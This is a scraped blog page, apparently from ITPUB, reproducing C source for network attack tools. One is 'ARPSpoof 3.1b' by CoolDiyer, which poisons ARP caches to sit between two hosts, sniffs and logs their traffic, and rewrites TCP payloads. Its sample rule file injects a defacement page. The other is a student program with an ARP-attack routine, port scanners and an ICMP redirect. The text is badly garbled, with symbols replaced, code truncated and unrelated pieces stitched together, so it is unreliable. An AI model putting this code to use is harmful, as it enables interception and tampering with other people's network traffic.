memset(szIPB,&0&,16);
if&(!GetMac((char&*)&argv[1],&ucIPA))
printf(&[!]&Error&Get&Mac&Address&of&%sn&,&argv[1]);
return&FALSE;
if&(!GetMac((char&*)&argv[2],&ucIPB))
printf(&[!]&Error&Get&Mac&Address&of&%sn&,&argv[2]);
return&FALSE;
strcpy((char&*)&szIPA,&(char&*)&argv[1]);
strcpy((char&*)&szIPB,&(char&*)&argv[2]);
StaticARP((unsigned&char&*)&szIPA,&ucIPA);
StaticARP((unsigned&char&*)&szIPB,&ucIPB);
g_uPort&=&atoi(argv[3]);
g_uMode&=&atoi(argv[5]);
return&TRUE;
//&显示ARP欺骗信息&(调试用)
//&加延迟是为了等待参数传递,因为函数公用一个ARPSPOOF变量
void&SpoofInfo(PARPSPOOF&arpspoof)
printf(&Spoof&%s&%s&MAC&%.2X-%.2X-%.2X-%.2X-%.2X-%.2Xn&,
arpspoof-&szTarget,&arpspoof-&szIP,&
arpspoof-&ucPretendMAC[0],&arpspoof-&ucPretendMAC[1],
arpspoof-&ucPretendMAC[2],&arpspoof-&ucPretendMAC[3],
arpspoof-&ucPretendMAC[4],&arpspoof-&ucPretendMAC[5]
Sleep(100);
//&处理ARP欺骗例程,开始Spoof
void&ARPSpoof()
PARPSPOOF&arpspoof&=&(PARPSPOOF)&malloc(sizeof(ARPSPOOF));
arpspoof-&adhandle&=&
memcpy(arpspoof-&ucSelfMAC,&ucSelf,&6);
//&Spoof&IP1&-&&IP2
strcpy((char&*)&arpspoof-&szTarget,&szIPA);
memcpy(arpspoof-&ucTargetMAC,&ucIPA,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPB);
memcpy(arpspoof-&ucIPMAC,&ucIPB,&6);
memcpy(arpspoof-&ucPretendMAC,&ucSelf,&6);
hThread[0]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
SpoofInfo(arpspoof);
if&(g_uMode&==&1)&//&如果双向欺骗
//&Spoof&IP2&-&&IP1
strcpy((char&*)&arpspoof-&szTarget,&szIPB);
memcpy(arpspoof-&ucTargetMAC,&ucIPB,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPA);
memcpy(arpspoof-&ucIPMAC,&ucIPA,&6);
memcpy(arpspoof-&ucPretendMAC,&ucSelf,&6);
hThread[1]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
SpoofInfo(arpspoof);
//&重置ARP欺骗,恢复受骗主机的ARP&cache
//&&&&&和ARPSpoof做相反操作
void&ResetSpoof()
printf(&[+]&Reseting&.....n&);
TerminateThread(hThread[0],&0);
TerminateThread(hThread[1],&0);
PARPSPOOF&arpspoof&=&(PARPSPOOF)&malloc(sizeof(ARPSPOOF));
arpspoof-&adhandle&=&
strcpy((char&*)&arpspoof-&szTarget,&szIPA);
memcpy(arpspoof-&ucTargetMAC,&ucIPA,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPB);
memcpy(arpspoof-&ucIPMAC,&ucIPB,&6);
memcpy(arpspoof-&ucPretendMAC,&ucIPB,&6);
memcpy(arpspoof-&ucSelfMAC,&ucSelf,&6);
hThread[0]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
if(g_uMode&==&1)
Sleep(200);
strcpy((char&*)&arpspoof-&szTarget,&szIPB);
memcpy(arpspoof-&ucTargetMAC,&ucIPB,&6);
strcpy((char&*)&arpspoof-&szIP,&szIPA);
memcpy(arpspoof-&ucIPMAC,&ucIPA,&6);
memcpy(arpspoof-&ucPretendMAC,&ucIPA,&6);
hThread[1]&=&CreateThread(NULL,&NULL,&(LPTHREAD_START_ROUTINE)SpoofThread,
(LPVOID)&arpspoof,&NULL,&NULL);
printf(&[-]&Sleep&5s&&);
for(int&i&=&0;&i&&&12;&i++,&Sleep(300))
printf(&.&);
printf(&n&);
TerminateThread(hThread[0],&0);
TerminateThread(hThread[1],&0);
//&pcap_breakloop后,所有对网卡的操作都会使用程序中止,切记
pcap_breakloop(adhandle);&
//&替换数据包中内容,&重新计算校验和
void&ReplacePacket(const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
eh&=&(ETHeader&*)&pkt_
ih&=&(IPHeader&*)&(pkt_data&+&14);
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);
//&得到TCP数据包的指针和长度
unsigned&char&*datatcp&=&(unsigned&char&*)&ih&+&sizeof(_IPHeader)&
+&sizeof(struct&_TCPHeader);
int&lentcp&=&ntohs(ih-&ipLength)&-&(sizeof(_IPHeader)&+&sizeof(_TCPHeader));
//&开始替换数据内容,重新计算校验和
PSTRLINK&pTmp&=&strL
int&i&=&0;
while&(pTmp-&next)
//&开始匹配规则进行替换
if&(Replace(datatcp,&lentcp,&pTmp-&szOld,&pTmp-&szNew))
printf(&&&&&Applying&rul&%s&==&&%sn&,&pTmp-&szOld,&pTmp-&szNew);
pTmp&=&pTmp-&
if&(i&&0)&//&如果数据包被修改,重新计算校验和
printf(&[*]&Done&%d&replacements,&forwarding&packet&of&size&%dn&,
i,&pkt_len);
ih-&ipChecksum&=&0;
th-&checksum&=&0;
ih-&ipChecksum&=&checksum((USHORT&*)ih,&sizeof(_IPHeader));
ComputeTcpPseudoHeaderChecksum(ih,&th,&(char&*)datatcp,&lentcp);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
//&分析显示数据包内容,或者保存至文件
void&AnalyzePacket(const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
char&szSource[16],szDest[16];
&&&&u_short&sport,&
eh&=&(ETHeader&*)&pkt_
ih&=&(IPHeader&*)&(pkt_data&+&14);
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);
sport&=&ntohs(th-&sourcePort);
dport&=&ntohs(th-&destinationPort&);
unsigned&char&*datatcp&=&(unsigned&char&*)&ih&+&sizeof(_IPHeader)&
+&sizeof(struct&_TCPHeader);
int&lentcp&=&ntohs(ih-&ipLength)&-&(sizeof(_IPHeader)&+&sizeof(_TCPHeader));
wsprintf(szSource,&&%d.%d.%d.%d&,
ih-&ipSourceByte.byte1,&ih-&ipSourceByte.byte2,
ih-&ipSourceByte.byte3,&ih-&ipSourceByte.byte4);
wsprintf(szDest,&&%d.%d.%d.%d&,
ih-&ipDestinationByte.byte1,&ih-&ipDestinationByte.byte2,
ih-&ipDestinationByte.byte3,&ih-&ipDestinationByte.byte4);
//&分析数据包
char&szTmpStr[85],&szTmpFlag[7];
szTmpFlag[6]&=&'�';
unsigned&char&FlagMask&=&1;
for(int&i=0;&i&6;&i++&)
if&((th-&flags)&&&FlagMask)
szTmpFlag[i]&=&TcpFlag[i];&
szTmpFlag[i]&=&'-';
FlagMask&=&FlagMask&&&&1;&
wsprintf(szTmpStr,
&nTCP&%15s-&%-15s&Bytes=%-4d&TTL=%-3d&Port:%d-&%d&%sn&,
szSource,&szDest,&lentcp,&ih-&ipTTL,&sport,&dport,&szTmpFlag);
printf(&%s&,&szTmpStr);
if&(bIsLog)&//&写入文件
SaveLog(szLogfile,&szTmpStr,&strlen(szTmpStr));
SaveLog(szLogfile,&datatcp,&lentcp);
//&&显示数据包的内容
for&(i&=&0;&i&&&&i++)
if&((*(datatcp+i)&&&0x000000ff)&!=&0x07)&&//&过滤掉可恶的Beep字符
printf(&%c&,&*(datatcp+i));
//&&处理转发、修改、保存数据包的例程
//&&程序的核心部分
void&ForwardPacket(pcap_t&*adhandle,&const&u_char&*pkt_data,&unsigned&int&pkt_len)
ETHeader&*
&&&&IPHeader&*
&&&&TCPHeader&*
&&&&u_int&ip_
char&szSource[16],szDest[16];
&&&&u_short&sport,&
eh&=&(ETHeader&*)&pkt_
if(eh-&type&!=&htons(ETHERTYPE_IP))
&//&只转发IP包
ih&=&(IPHeader&*)&(pkt_data&+&14);&//找到IP头的位置,14为以太头的长度
ip_len&=&(ih-&iphVerLen&&&0xf)&*&4;&
th&=&(TCPHeader&*)&((u_char*)ih&+&ip_len);&//&找到TCP的位置
//&将端口信息从网络型转变为主机顺序
sport&=&ntohs(th-&sourcePort);
dport&=&ntohs(th-&destinationPort&);
//&得到源IP地址,目标IP地址
wsprintf(szSource,&&%d.%d.%d.%d&,
ih-&ipSourceByte.byte1,&ih-&ipSourceByte.byte2,
ih-&ipSourceByte.byte3,&ih-&ipSourceByte.byte4);
wsprintf(szDest,&&%d.%d.%d.%d&,
ih-&ipDestinationByte.byte1,&ih-&ipDestinationByte.byte2,
ih-&ipDestinationByte.byte3,&ih-&ipDestinationByte.byte4);
//&开始过滤要转发的数据包
if&(strcmp(szDest,&szIPSelf)&!=&0&&&&memcmp(ucSelf,&eh-&dhost,6)&==&0)
//&rebuild&IPA&-&&IPB
if&(memcmp(eh-&shost,&ucIPA,&6)&==&0)
//&修改以太网头
memcpy(eh-&shost,&eh-&dhost,&6);
memcpy(eh-&dhost,&ucIPB,&6);
if&(ih-&ipProtocol&==&PROTO_TCP&&&&dport&==&g_uPort)
if&(bIsReplace)&//&是否替换
printf(&[+]&Caught&%15s:%-4d&-&&%s:%dn&,&szSource, sport,&szDest,&dport);
ReplacePacket(pkt_data,&pkt_len);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
AnalyzePacket(pkt_data,&pkt_len);
if&(pcap_sendpacket(adhandle,&(const&unsigned&char&*)&pkt_data,&pkt_len)&&&0)
printf(&[!]&Forward&thread&send&packet&errorn&);
//&rebuild&IPB&-&&IPA
else&if&(memcmp(eh-&shost,&ucIPB,&6)&==&0)
memcpy(eh-&shost,&eh-&dhost,&6);
memcpy(eh-&dhost,&ucIPA,&6);
if&(ih-&ipProtocol&==&PROTO_TCP&&&&sport&==&g_uPort)
if&(bIsReplace)
printf(&[+]&Caught&%15s:%-4d&-&&%s:%dn&,&szSource, sport,&szDest,&dport);
ReplacePacket(pkt_data,&pkt_len);
printf(&[*]&Forwarding&untouched&packet&of&size&%dn&,&pkt_len);
AnalyzePacket(pkt_data,&pkt_len);
if(pcap_sendpacket(adhandle,&(const&unsigned&char&*)&pkt_data,&pkt_len)&&&0)
printf(&[!]&Forward&thread&send&packet&errorn&);
//&pcap_loop的回调函数
//&把接收到的数据传给ForwardPacket函数处理
void&packet_handler(u_char&*param,&const&struct&pcap_pkthdr&*header,&const&u_char&*pkt_data)
ForwardPacket(adhandle,&pkt_data,header-&len);
//&释放一个实例规则文件
int&ReleaseJob(const&char&*szName)
if&((fp&=&fopen(&job.txt&,&w&))&==&NULL)
fputs(&----nHTTP/1.n----nHTTP/1.1&200&OK\r\n&&
&Server:&CoolDiyer's&Hack&IIS\r\nContent-Length:&27\r\n&&
&Connection:&close\r\nContent-Type:&text/html\r\n\r\n&&
&Hack&by&cooldiyer&noframes&n----&,&fp);
fclose(fp);
//&主函数,主要处理参数的初始化
int&main(int&argc,&char&*argv[])
printf(&ARPSpoof&Ver&3.1b&by&CoolDiyern&);
if&(argc&&1)
if&(argv[1][1]&==&'l')&//&列出可用的网卡
ListAdapters();
if&(argv[1][1]&==&'n')&//&释放一个示例规则文件&job.txt
if&(ReleaseJob(&job.txt&))
printf(&[+]&Replace&Job&file&job.txt&release&success...n&);
printf(&[!]&Release&job&file&errorn&);
return&-1;
if&(argc&==&4&&&&argv[1][1]&==&'s')
EnumLanHost(argv[2],&argv[3]);
if&(argc&&&6)&//&参数不正确,显示使用帮助
//&打开网卡,初始化szIPSelf,&ucSelf,&szIPGate变量
if&((adhandle&=&OpenAdapter(atoi(argv[4]),&szIPSelf,&ucSelf,&szIPGate))&==&NULL)
printf(&[!]&Open&adatper&error!n&);
return&FALSE;
//&初始化其它变量,转入核心例程
if&(InitSpoof(argv))
if&(argc&==&7&&&&strcmpi(argv[6],&&/reset&)&==&0)&//&启用恢复线程,5秒后退出程序
if&(g_uMode&==&1)
printf(&[*]&Reset&&%s&&-&&%sn&,&szIPA&,szIPB);
printf(&[*]&Reset&&%s&--&&%sn&,&szIPA&,szIPB);
ResetSpoof();
else&if&(argc&&5&)
SetConsoleCtrlHandler((PHANDLER_ROUTINE)&CtrlHandler,&TRUE);
if&(argc&==&8&&&&argv[6][1]&==&'r')&//&如果是要替换转发内容
if&(ReadJob(argv[7],&strLink))&//&加载规则文件,并显示替换规则
PSTRLINK&pTmp&=&strL
while&(pTmp-&next)
printf(&[*]&Parsing&rul&%s&==&&%sn&,&pTmp-&szOld,&pTmp-&szNew);
pTmp&=&pTmp-&
bIsReplace&=&TRUE;
printf(&[+]&Loaded&%d&rules...n&,&i);
return&-1;
if&(argc&==&8&&&&argv[6][1]&==&'s')&//&&是否保存数据到文件
strcpy(szLogfile,&argv[7]);
bIsLog&=&TRUE;
printf(&[+]&Save&log&to&%sn&,&szLogfile);
if&(g_uMode&==&1)&//&&双向欺骗
printf(&[*]&Spoofing&&%s&&-&&%sn&,&szIPA&,szIPB);
else&//&单向欺骗
printf(&[*]&Spoofing&&%s&--&&%sn&,&szIPA&,szIPB);
if&(!bIsReplace)&//&只转发,不替换
printf(&[+]&Using&fixed&forwarding&thread.n&);
//&开始主要例程,欺骗并转发处理数据包
ARPSpoof();
pcap_loop(adhandle,&0,&packet_handler,&NULL);
pcap_close(adhandle);
//&帮助函数,对一些参数的说明和程序的使用
void&Help()
printf(&Usage:n&);
printf(&&&ArpSpoof&&IP1&&&IP2&&&PORT&&&AdpNum&&&Mode&&/[r|s]&&File&n&);
printf(&&&ArpSpoof&/s&&IP&&&Mask&n&);
printf(&&&ArpSpoof&/ln&);
printf(&tMode&Options:ntt0tIP1&--&&IP2n&);
printf(&tt1tIP1&&-&&IP2n&);
printf(&Examples:n&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&80&2&1&/r&job.txtn&);
printf(&t&&#&Spoof&192.168.0.1&&-&&192.168.0.8:80&with&rulenn&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&21&2&1&/s&sniff.logn&);
printf(&t&&#&Spoof&192.168.0.1&&-&&192.168.0.8:80&save&to&lognn&);
printf(&t&&ArpSpoof&192.168.0.1&192.168.0.8&80&2&0&/RESETn&);
printf(&t&&#&Reset&192.168.0.1&--&&192.168.0.8:80nn&);
printf(&t&&ArpSpoof&/s&192.168.0.1&255.255.255.0n&);
printf(&t&&#&Scan&lan&hostnn&);
printf(&t&&ArpSpoof&/ln&);
printf(&t&&#&Lists&adaptersnn&);
printf(&t&&ArpSpoof&/nn&);
printf(&t&&#&Release&a&new&replace&rule&filen&);
CopyRight & 2008- All Rights reserved.&&苏ICP备博客访问: 329828
博文数量: 2120
注册时间:
鏆傛棤浠嬬粛
ITPUB论坛APP
ITPUB论坛APP
APP发帖 享双倍积分
IT168企业级官微
微信号:IT168qiye
系统架构师大会
微信号:SACC2013
分类: Linux
最后的纪念---linuxGL(转)[@more@]
/*作品名:linuxGL作者:陈兴华来自:广州学校:THXY College班别:网络042班*/#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#define __FAVOR_BSD#include#ifdef __linux#include#include#else#include#include#include#include#endif#define BUFSIZE 4096#define PACKET_LEN 72#define MAXSIZE 4096#define OPTNUM 8#define ON 1#define OFF 0enum{ETHER,ARP,IP,TCP,UDP,ICMP,DUMP,ALL};enum{OPEN,CLOSE};enum{CMD_NAME,CMD_SELECT,START_IP,LAST_IP};enum{CMD_NAME1,CMD_SELECT2,DST_IP,START_PORT,LAST_PORT};enum {CMD_NAME2,S3,TARGET_IP,OLD_ROUTER,NEW_ROUTER,DST_IP1 };enum{CMD_NAME3,S4,DST_IP3};enum{CMD_NAME5,IFNAME,DST_IP4,MAC_ADDR,OPTION};enum{NORMAL,REPLY,REQUEST};#ifndef _linux_/*实现使用BPF作为访问数据链路层的手段用于FreeBSD系统中*/int open_bpf(char *ifname); #endifvoid make_icmp8_packet(struct icmp *icmp,int len,int n); /*ICMP头部*/void make_udp_header( struct udphdr *udp); /*UDP头部*/ void make_ip_header(struct ip *ip,int target_ip,int dst_ip,int proto,int iplen);void make_ip_header2(struct ip *ip,int srcip, int dstip,int iplen); /*IP头部*/void make_icmp5_header(struct icmp *icmp,u_int gw_ip); void make_ethernet(struct ether_header *eth,u_char *ether_dhost, /* 以太帧头部*/u_char *ether_shost,u_short ether_type);void make_arp(struct ether_arp *arp,int op,u_char *arp_sha, /* ARP头部*/u_char *arp_spa,u_char *arp_tha, u_char *arp_tpa);u_short checksum(u_short *data,int len);void tvsub(struct timeval *out,struct timeval *in); /*计算往返时间*/void scan_host(int argc,char *argv[]); /*主机查找*/void scan_port(int argc,char *argv[]); /*端口查找*/void scan_uport(int argc,char *argv[]); /*UDP端口查找*/void print_ethernet(struct ether_header *eth); /*打印以太数据*/void print_arp(struct ether_arp *arp); /*打印ARP*/void print_ip(struct ip *ip); /*打印IP数据*/void print_icmp(struct icmp *icmp); /*打印ICMP数据*/void print_tcp(struct tcphdr *tcp); /*打印TCP数据*/void print_udp(struct udphdr *udp); /*打印UDP数据*/void dump_packet(unsigned char *buff,int len); /*打印格式*/void kill_serve(int argc, char *argv[]); /*关闭或开启服务*/void on(int argc,char *argv[],char *server_save,FILE *tmp_s); /*开启服务*/void off(int argc,char *argv[],char *server_save,FILE *tmp_s); /*关闭服务*/char* yi_wei(char *server_save,int flag); /*关闭或开启服务中字符的移位*/void redirect(int argc,char *argv[]); /*ICMP重定向*/void scan_route(int argc,char *argv[]);/*查找路由*/void m_arp(int argc,char *argv[]); /*ARP操作*/char *mac_ntoa(u_char *d);/*将数组中存储的MAC地址变换为字符串*/char *tcp_ftoa(int flag); /*将TCP报头的协议标志变换为字符串*/char *ip_ttoa(int flag);/*将IP报头的TOS变为字符串*/char *ip_ftoa(int flag);/*将IP报头的段位变换为字符串*/struct packet_udp{};int main(int argc,char **argv){struct ether_header *struct ether_arp *struct ip *struct icmp *struct tcphdr *struct udphdr *char buff[MAXSIZE];char *p;char *char ifname[256]="x10";int opt[OPTNUM];#ifndef _linux_int bpf_struct bpf_hdr *#endifopt[ETHER]=OFF;opt[ARP]=ON;opt[IP]=ON;opt[TCP]=ON;opt[UDP]=ON;opt[ICMP]=ON;opt[DUMP]=OFF;opt[ALL]=OFF;while( (c=getopt(argc,argv,"mtruoskaei:p:dh"))!=EOF ){switch(c){case 'k':kill_serve(argc,argv);case 'm':m_arp(argc,argv);case 't':scan_route(argc,argv);case 'r':redirect(argc,argv);case 'u':scan_uport(argc,argv);case 'o':scan_port(argc,argv);case 's':scan_host(argc,argv);case 'a':opt[ALL]=ON;case 'i':strcpy(ifname,optarg);case 'e':opt[ETHER]=ON;case 'd':opt[DUMP]=ON;case 'p':opt[ARP]=OFF;opt[IP]=OFF;opt[TCP]=OFF;opt[UDP]=OFF;opt[ICMP]=OFF;optind--;while(argv[optind]!=NULL && argv[optind][0]!='-'){if(strcmp(argv[optind],"arp")==0)opt[ARP]=ON;else if(strcmp(argv[optind],"ip")==0)opt[IP]=ON;else if(strcmp(argv[optind],"tcp")==0)opt[TCP]=ON;else if(strcmp(argv[optind],"udp")==0)opt[UDP]=ON;else if(strcmp(argv[optind],"icmp")==0)opt[ICMP]=ON;else if(strcmp(argv[optind],"other")==0);else{exit(0);}optind++;} default:fprintf(stderr,"no argument my Master linuxcici");exit(0); }}if(optind<argc){while(optind<argc)printf("%s",argv[optind++]);printf("
");fprintf(stderr,"no argument or wrong my Master linuxcici
");exit(0);}#ifdef __linuxif( (s=socket(AF_INET,SOCK_PACKET,htons(ETH_P_ALL)))<0 ){perror("socket");exit(0);}if(strcmp(ifname,"x10")!=0) {memset(&sa,0,sizeof(sa));sa.sa_family=AF_INET;strcpy(sa.sa_data,ifname);if(bind(s,&sa,sizeof(sa))<0){perror("bind");exit(0);}}#elseif((s=open_bpf(ifname))<0)exit(0);bpf_len=0;#endifwhile(1){#ifndef __linuxif(bpf_len<=0){if( (bpf_len=read(s,buff,MAXSIZE))<0 ){perror("read");exit(0);}bp=(struct bpf_hdr *)}else{bp=(struct bpf hdr *)( (char *)bp+bp->bh_hdrlen+bp->bh_caplen);bp=(struct bpf hdr *)BPF_WORDALIGN((int)bp);}p=po=(char *)bp+bp->bh_len=bp->bh_#ifdef DEBUGprintf("bpf_len=%d,",bpf_len);printf("hdrlen=%d,",bp->hdrlen);printf("caplen=%d,",bp->bh_caplen);printf("datalen=%d
",bp->bh_datalen);#endif bpf_len-=BPF_WORDLIGN(bp->bh_hdrlen+bp->bh_caplen); #else if((len=read(s,buff,MAXSIZE))<0){perror("read");exit(0);}p= po=#endifdisp=OFF;eth=(struct ether_header *)p;p=p+sizeof(struct ether_header);if(ntohs(eth->ether_type)==ETHERTYPE_ARP){if(opt[ARP]==ON) {if(opt[ETHER]==ON)print_ethernet(eth);arp=(struct ether_arp *)p;print_arp(arp);disp=ON;}}else if (ntohs(eth->ether_type)==ETHERTYPE_IP){ip=(struct ip *)p;p=p+((int)(ip->ip_hl)<<2);if(opt[IP]==ON && opt[TCP]==OFF &&opt[UDP]==OFF && opt[ICMP]==OFF){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);disp=ON;}switch(ip->ip_p){case IPPROTO_TCP:tcp=(struct tcphdr *)p;# ifdef _FAVOR_BSD_p=p+((int)(tcp->th_off)<<2);#elsep=p+((int)(tcp->doff)<<2);#endifif(opt[TCP]==ON){if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}print_tcp(tcp);disp=ON;}case IPPROTO_ICMP:icmp=(struct icmp *)p;p=p+sizeof(struct udphdr);if(opt[ICMP]==ON){if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}print_icmp(icmp);disp=ON;}default:if(opt[ALL]==ON) {if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}printf("Protocol:unknow
");disp=ON;}}}else{if(opt[ALL]==ON){if(opt[ETHER]==ON)print_ethernet(eth);printf("protocol unknow
");disp=ON;}}if(disp==ON) {if(opt[DUMP]==ON)dump_packet(po,len);printf("
");}}return EXIT_SUCCESS; }/***************************** arp_attack ************************************/void m_arp(int argc,char *argv[]){struct ether_header *struct ether_arp *char recv_buff[4096];char send_buff[4096];char *char *char *char mac_addr[6];int tmp[6];#ifndef __linuxstruct bpf_hdr *int bpf_#else#endifu_int dst_char ifname[256];flag=NORMAL;if(argc==5){if(strcmp(argv[OPTION],"reply")==0)flag=REPLY;else if(strcmp(argv[OPTION],"request")==0)flag=REQUEST;else{exit(0);}}else if (argc!=4){exit(0);}strcpy(ifname,argv[IFNAME]);dst_ip=inet_addr(argv[DST_IP4]);if(sscanf(argv[MAC_ADDR],"%x:%x:%x:%x:%x:%x",&tmp[0],&tmp[1],&tmp[1],&tmp[3],&tmp[4],&tmp[5])!=6){printf("MAC address error %s
",argv[MAC_ADDR]);exit(0);}for(i=0;i<6;i++)mac_addr[i]=tmp[i];#ifdef __linuxif( (s=socket(PF_PACKET,SOCK_PACKET,htons(ETH_P_ALL)))<0 ){perror("socket");exit(0);}memset(&sa,0,sizeof(sa));sa.sa_family=PF_PACKET;strcpy(sa.sa_data,ifname);if(bind(s,&sa,sizeof(sa))<0){perror("bind");exit(0);}#elseif( (s=open_bpf(ifname))<0 )exit(0);bpf_len=0;#endifwhile(1){#ifndef __linuxif(bpf_len<=0){if( (bpf_len=read(s,recv_buff,4096))<0 ){perror("read");exit(0);}bp=(struct bpf_hdr *)recv_}else{bp=(struct bpf_hdr *)((char *)bp+bp->bh_hdrlen);bp=(struct bpf_hdr *)BPF_WORDALIGH ((int)bp) ;}rp=rpo=(char *)bp+bp->bh_len=bp->bh_#ifdef DEBUGprintf("bpf_len=%d
",bpf_len);printf("hdrlen=%d
",bp->bh_hdrlen);printf("caplen=%d
",bp->caplen);printf("datalen=%d
",bp->bh_datalen);#endifbpf_len-=BPF_WORDALIGN(bp->bh_hdrlen+bp->bh_caplen);#elseif( (len=read(s,recv_buff,4096))<0 ){perror("read");exit(0);}rp=rpo=recv_#endifeth=(struct ether_header *)rp=rp+sizeof(struct ether_header);if( memcmp(eth->ether_dhost,mac_addr,6)!=0&& memcmp(eth->ether_shost,mac_addr,6)!=0&& ntohs(eth->ether_type)==ETHERTYPE_ARP){arp=(struct ether_arp *)if( dst_ip==*(int *)(arp->arp_spa)){static char zero[6];static char one[6]={0xff,0xff,0xff,0xff,0xff,0xff};printf("Hit............Linuxcici");print_ethernet(eth);print_arp(arp);sp=send_buff+sizeof(struct ether_header);if(flag==REPLY){make_arp((struct ether_arp *)sp,ARPOP_REPLY,mac_addr,arp->arp_tpa,arp->arp_sha,arp->arp_sha);make_ethernet((struct ether_header *)send_buff,arp->arp_sha,mac_addr,ETHERTYPE_ARP);}else if (flag==REQUEST){make_arp((struct ether_arp *)sp,ARPOP_REQUEST,mac_addr,arp->arp_spa,zero,arp->arp_tpa);make_ethernet((struct ether_header *)send_buff,one,mac_addr,ETHERTYPE_ARP);}else{make_arp((struct ether_arp *)sp,ARPOP_REQUEST,mac_addr,arp->arp_tpa,zero,arp->arp_spa);make_ethernet((struct ether_header *)send_buff,arp->arp_sha,mac_addr,ETHERTYPE_ARP);}len=sizeof(struct ether_header)+sizeof(struct ether_arp);usleep(500*1000);#ifndef __linuxif(write(s,send_buff,len)<0){perror("write");exit(0);}#elseif(sendto(s,send_buff,len,0,&sa,sizeof(sa))<0){perror("sendto");exit(0);}#endifprintf("SEND---------------------my Master linuxcici");print_ethernet((struct ether_header *)send_buff);print_arp((struct ether_arp *)sp);}}}exit(1);}void make_ethernet(struct ether_header *eth,u_char *ether_dhost,u_char *ether_shost,u_short ether_type){memcpy(eth->ether_dhost,ether_dhost,6);memcpy(eth->ether_shost,ether_shost,6);eth->ether_type=htons(ether_type);}void make_arp(struct ether_arp *arp,int op,u_char *arp_sha,u_char *arp_spa,u_char *arp_tha,u_char *arp_tpa){arp->arp_hrd=htons(1);arp->arp_pro=htons(ETHERTYPE_IP);arp->arp_hln=6;arp->arp_pln=4;arp->arp_op=htons(op);memcpy(arp->arp_sha,arp_sha,6);memcpy(arp->arp_spa,arp_spa,4);memcpy(arp->arp_tha,arp_tha,6);memcpy(arp->arp_tpa,arp_tpa,4);}/***************************** arp_attack ************************************//***************************** scan_route ************************************/void scan_route(int argc,char *argv[]){struct packet_struct sockaddr_in send_int send_ int recv_ u_char buff[512];struct timeval tvm0;struct timeval tvm1;fd_int on=1; int dns_flg=0;if(argc==3 && strcmp(argv[1],"-n")==0){dns_flg=1; argv[1]=argv[2]; argv[2]=NULL;argc=2;}if(argc!=2){fprintf(stderr, "usage: %s [-n] dst_ip
",argv[CMD_NAME]);exit(EXIT_FAILURE);}memset( (char *)&send_sa,0,sizeof(struct sockaddr_in) );send_sa.sin_family=AF_INET;if( (send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP3]))==INADDR_NONE ){struct hostent * if( (he=gethostbyname(argv[DST_IP3]))==NULL ){fprintf(stderr,"unknow host %s
",argv[DST_IP3]);exit(EXIT_FAILURE);}send_sa.sin_family=he->h_ memcpy( (char *)&(send_sa.sin_addr),he->h_addr,sizeof(he->h_length) ); }if( (send_sd=socket(AF_INET, SOCK_RAW,IPPROTO_RAW))<0 ){perror("socket(SOCK_RAW)");exit(EXIT_FAILURE);} if( setsockopt(send_sd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))<0 ){perror("setsockopt(IPPROTO_IP,IP_HDRINCL)");exit(EXIT_FAILURE);}if( (recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0 ) {perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}len=sizeof(struct packet_udp);memset( (char *)&sendpacket,0,sizeof(struct packet_udp) ); make_udp_header(&(sendpacket.udp)); make_ip_header2(&(sendpacket.ip),0,send_sa.sin_addr.s_addr,len);printf("scanroute %s
",inet_ntoa(send_sa.sin_addr)); for(ttl=1;ttl<=64;ttl++){printf("%2d:",ttl); fflush(stdout); sendpacket.ip.ip_ttl=for(i=0;i<3;i++){if(sendto(send_sd,(char *)&sendpacket,len,0,(struct sockaddr *)&send_sa,sizeof (send_sa))<0){perror("sendto");exit(EXIT_FAILURE);}gettimeofday(&tvm0,(struct timezone *)0);tv.tv_sec=3;tv.tv_usec=0;reread:FD_ZERO(&readfd); FD_SET(recv_sd,&readfd);if( (select(recv_sd+1, &readfd,NULL,NULL,&tv))>0 ){ struct icmp * struct ip *struct hostent * char hostip[256];struct in_if( recvfrom(recv_sd,buff,512,0,NULL,NULL)<0 ){perror("recvfrom");exit(EXIT_FAILURE);}ip=(struct ip *)hlen=ip->ip_hl<<2; if( ip->ip_p !=IPPROTO_ICMP)icmp=(struct icmp *)(buff+hlen);if( (icmp->icmp_type!=ICMP_TIMXCEED|| icmp->icmp_code !=ICMP_TIMXCEED_INTRANS)&& (icmp->icmp_type!=ICMP_UNREACH_PORT) ) gettimeofday(&tvm1,(struct timezone *)0);tvsub(&tvm1,&tvm0);memcpy(&ipaddr,&(ip->ip_src.s_addr),sizeof (ipaddr));strcpy(hostip,inet_ntoa(* (struct in_addr *)&(ip->ip_src.s_addr)));if(dns_flg==1)printf("% -15s",hostip);else if( (host=gethostbyaddr( ( char *)&ipaddr,4,AF_INET))==NULL )printf(" % -15s(%s)",host,hostip); else printf("% -15s(%s)",hostip,host->h_name); printf(": RTT= %8.4fms",tvm1.tv_sec * 